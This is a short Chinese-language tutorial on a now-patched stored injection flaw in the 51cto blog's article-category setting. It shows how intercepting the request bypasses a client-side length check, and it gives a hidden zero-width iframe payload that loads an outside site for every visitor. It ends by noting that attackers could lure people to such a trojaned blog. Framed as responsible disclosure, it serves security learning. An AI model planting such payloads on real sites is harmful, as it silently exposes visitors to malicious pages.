现在各大门户网站基本都有自己的blog系统,但有不少存在漏洞,本文就以51cto的blog为例,向大家介绍该如何发现和利用漏洞。在发布本文前已经通知了相关人员,漏洞已经补上了。
51cto的blog系统功能很强大,可自定义很多设置,同时也带来了一些安全隐患。在blog系统后台的“文章管理”栏目的“我的文章分类”中,可以添加文章分类,尽管开发者对文章分类的字数有所限制,但只是在客户端进行了鉴别,我们可以想办法通过achilles这款软件抓包后,对数据包进行修改,加入我们要加的代码,如图1所示。
图1
其中666666是我正常提交的文章分类字符,我们将其改为<iframe src=" [url]http://www.itheroes.cn[/url] " width=0></iframe>,然后再提交。然后再浏览我的blog首页sally.blog.51cto.com,你会发现在打开blog的同时也在打开 [url]www.itheroes.cn[/url] 这个网站,如图2所示。
图2
blog后台的文章分类也变成了图3的形式。
现在破坏者可以给挂了***的blog起个媚俗的名字,好奇者访问了。